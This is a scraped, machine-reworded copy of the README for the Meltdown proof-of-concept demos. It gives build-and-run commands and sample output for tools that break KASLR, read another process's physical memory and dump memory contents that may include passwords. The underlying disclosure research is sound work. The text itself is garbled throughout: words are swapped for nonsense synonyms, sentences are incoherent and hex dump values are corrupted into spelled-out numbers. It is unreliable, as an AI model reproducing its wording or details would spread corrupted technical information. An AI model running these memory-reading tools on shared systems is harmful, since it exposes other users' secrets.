IAIK/meltdown
This repository comprises plenty of purposes, demonstrating the Meltdown malicious program. For technical data in regards to the malicious program, consult with the paper:
- Meltdown by Lipp, Schwarz, Gruss, Prescher, Haas, Mangard, Kocher, Genkin, Yarom, and Hamburg
The purposes in this repository are constructed with libkdump, a library we developed for the paper. This library simplifies exploitation of the malicious program by robotically adapting to decided properties of the environment.
Movies
This repository comprises two movies demonstrating Meltdown
Demos
This repository comprises five demos to present varied enlighten cases. All demos are tested on Ubuntu sixteen.04 with an Intel Core i7-6700K, but they’d more than doubtless still work on any Linux gadget with any contemporary Intel CPU since 2010.
For easiest outcomes, we counsel a handy book a rough CPU that helps Intel TSX (e.g. any Intel Core i7-5xxx, i7-6xxx, or i7-7xxx).
Furthermore, every demo wants to be pinned to 1 CPU core, e.g. with taskset.
Demo #1: A first test (test)
Here is truly the most general demo. It makes enlighten of Meltdown to study accessible addresses from the enjoy handle space, no longer breaking any isolation mechanisms.
If this demo doesn’t work for you, the closing demos would possibly maybe more than doubtless no longer most doubtless no longer work both. The reasons are manifold, e.g., the CPU shall be too unhurried, no longer increase out-of-characterize execution, the excessive-resolution timer is no longer precise ample (especially in VMs), the operating gadget doesn’t increase custom signal handlers, etc.
Sort and Scramble
Whereas you happen to ogle an output much like this
Inquire: Welcome to the effective world of microarchitectural assaults
Got: Welcome to the effective world of microarchitectural assaults
then the basic demo works.
Demo #2: Breaking KASLR (kaslr)
Initiating with Linux kernel four.12, KASLR (Kernel Tackle Region Structure Randomizaton) is active by default. This skill, that the positioning of the kernel (and moreover the say physical diagram which maps the full physical reminiscence) adjustments with every reboot.
This demo makes enlighten of Meltdown to leak the (secret) randomization of the say physical diagram. This demo requires root privileges to go up the formulation. The paper describes a variant which doesn’t require root privileges.
Sort and Scramble
make
sudo taskset 0x1 ./kaslr
After a few seconds, you need to more than doubtless still ogle something much like this
[+] Pronounce physical diagram offset: 0xffff880000000000
Demo #three: Reliability test (reliability)
This demo assessments how legit physical reminiscence would possibly maybe more than doubtless moreover be study. For this demo, you both need the say physical diagram offset (e.g. from demo #2) or it be crucial to disable KASLR by specifying nokaslr on your kernel say line.
Sort and Scramble
Sort and begin up reliability. Whereas you happen to function no longer enjoy KASLR disabled, the first parameter is the offset of the say physical diagram. Otherwise, this system doesn’t require a parameter.
make
sudo taskset 0x1 ./reliability
After a few seconds, you need to more than doubtless still bag an output much like this:
[-] Success rate: Ninety 9.93% (study 1354 values)
Demo #four: Learn physical reminiscence (physical_reader)
This demo reads reminiscence from a varied job by straight reading physical reminiscence. For this demo, you both need the say physical diagram offset (e.g. from demo #2) or it be crucial to disable KASLR by specifying nokaslr on your kernel say line.
In predominant, this program can study arbitrary physical addresses. However, as the physical reminiscence comprises a range of non-human-readable data, we provide a test tool (secret), which places a human-readable string into reminiscence and straight gives the physical handle of this string.
Sort and Scramble
For the demo, first budge secret (as root) to bag the physical handle of a human-readable string:
It goes to also still output something love this:
[+] Secret: Whereas you happen to would possibly maybe more than doubtless study this, that is truly depraved
[+] Physical handle of secret: 0x390fff400
[+] Exit with Ctrl+C whereas you are done reading basically the essential
Let the secret program running, and begin up physical_reader. The first parameter is the physical handle printed by secret. Whereas you happen to function no longer enjoy KASLR disabled, the 2nd parameter is the offset of the say physical diagram.
taskset 0x1 ./physical_reader 0x390fff400
After a few seconds, you need to more than doubtless still bag an output much like this:
[+] Physical handle : 0x390fff400
[+] Physical offset : 0xffff880000000000
[+] Studying virtual handle: 0xffff880390fff400
Whereas you happen to would possibly maybe more than doubtless study this, that is truly depraved
Demo #5: Dump the reminiscence (memdump)
This demo dumps the pronounce of the reminiscence. As demo #three and #four, it makes enlighten of the say physical diagram, to dump the contents of the physical reminiscence in a hexdump-love layout.
All all over again, as the physical reminiscence comprises a range of non-human-readable pronounce, we provide a test tool to hang burly portions of the physical reminiscence with human-readable strings.
Sort and Scramble
For the demo, first budge memory_filler to hang the reminiscence with human-readable strings. The first argument is the quantity of reminiscence (in gigabytes) to hang.
Then, budge the memdump tool to dump reminiscence contents. Whereas you happen to done memory_filler earlier than, you need to more than doubtless still ogle some string fragments.
Whereas you happen to enjoy Firefox or Chrome with a pair of tabs running, you need to more than doubtless moreover ogle elements of the web sites which are begin or had been no longer too long ago closed.
The first parameter is the physical handle at which the dump would possibly maybe more than doubtless still begin up (dash away empty to begin up at the first gigabyte). Whereas you happen to function no longer enjoy KASLR disabled, the 2nd parameter is the offset of the say physical diagram.
taskset 0x1 ./memdump 0x240000000 # begin up at 9 GB
You would possibly maybe more than doubtless still bag a hexdump of elements of the reminiscence (potentially even containing secrets much like passwords, ogle instance within the paper), e.g.:
240001c9f: | 00 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | .m.............. |
24000262f: | 00 7d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | .}.............. |
24000271f: | 00 00 00 00 00 00 00 00 00 00 00 00 sixty five 6e 20 seventy five | ............en u |
24000272f: | seventy three sixty five seventy two 20 seventy three 70 sixty one Sixty three sixty five 20 sixty one 6e sixty four 20 6b sixty five | ser space and ke |
24000273f: | seventy two 6e sixty five 6c Fifty seven sixty five 6c Sixty three 6f 6d sixty five 20 seventy four 6f 20 seventy four | rnelWelcome to t |
24000298f: | 00 sixty one seventy two seventy 9 20 62 sixty five seventy four seventy seven sixty five sixty five 6e 20 seventy five seventy three sixty five | .ary between enlighten |
24000299f: | seventy two 20 seventy three 70 sixty one Sixty three sixty five 20 sixty one 6e sixty four 20 6b sixty five seventy two 6e | r space and kern |
2400029af: | sixty five 6c Forty two seventy five seventy two 6e 20 sixty one 66 seventy four sixty five seventy two 20 seventy two sixty five sixty one | elBurn after rea |
2400029bf: | sixty four sixty 9 6e sixty seven 20 seventy four sixty eight sixty 9 seventy three 20 seventy three seventy four seventy two sixty 9 6e sixty seven | ding this string |
240002dcf: | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 | ................ |
2400038af: | 6a seventy five seventy three seventy four 20 seventy three 70 sixty 9 sixty five sixty four 20 6f 6e 20 sixty one 00 | true spied on a. |
240003c8f: | 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ |
24000412f: | 00 00 00 00 00 00 00 00 00 00 00 00 sixty five seventy four seventy three 2e | ............ets. |
24000413f: | 2e 2e Fifty seven sixty five 6c Sixty three 6f 6d sixty five 20 seventy four 6f 20 seventy four sixty eight sixty five | ..Welcome to the |
2400042ff: | 00 00 00 00 00 00 00 00 00 6e sixty seven seventy two sixty one seventy four seventy five 6c | .........ngratul |
24000430f: | sixty one seventy four sixty 9 6f 6e seventy three 2c 20 seventy 9 6f seventy five 20 6a seventy five seventy three seventy four | ations, you true |
24000431f: | 20 seventy three 70 sixty 9 sixty five sixty four 20 6f 6e 20 sixty one 6e 20 sixty one 70 70 | spied on an app |
Warnings
Warning #1: We’re providing this code as-is. You are in payment of shielding yourself, your own residence and data, and others from any dangers attributable to this code. This code would possibly maybe more than doubtless trigger surprising and undesirable habits to occur on your machine. This code would possibly maybe more than doubtless no longer detect the vulnerability on your machine.
Warning #2: Whereas you happen to search out that a laptop is inclined to the Meltdown malicious program, you need to more than doubtless are attempting to preserve far from the utilization of it as a multi-person gadget. Meltdown breaches the CPU’s reminiscence protection. On a machine that’s inclined to the Meltdown malicious program, one job can study all pages feeble by other processes or by the kernel.
Warning #three: This code is true for finding out functions. Discontinuance no longer budge it on any productive methods. Discontinuance no longer budge it on any gadget that can be feeble by one other person or entity.
Learn Extra
Commentaires récents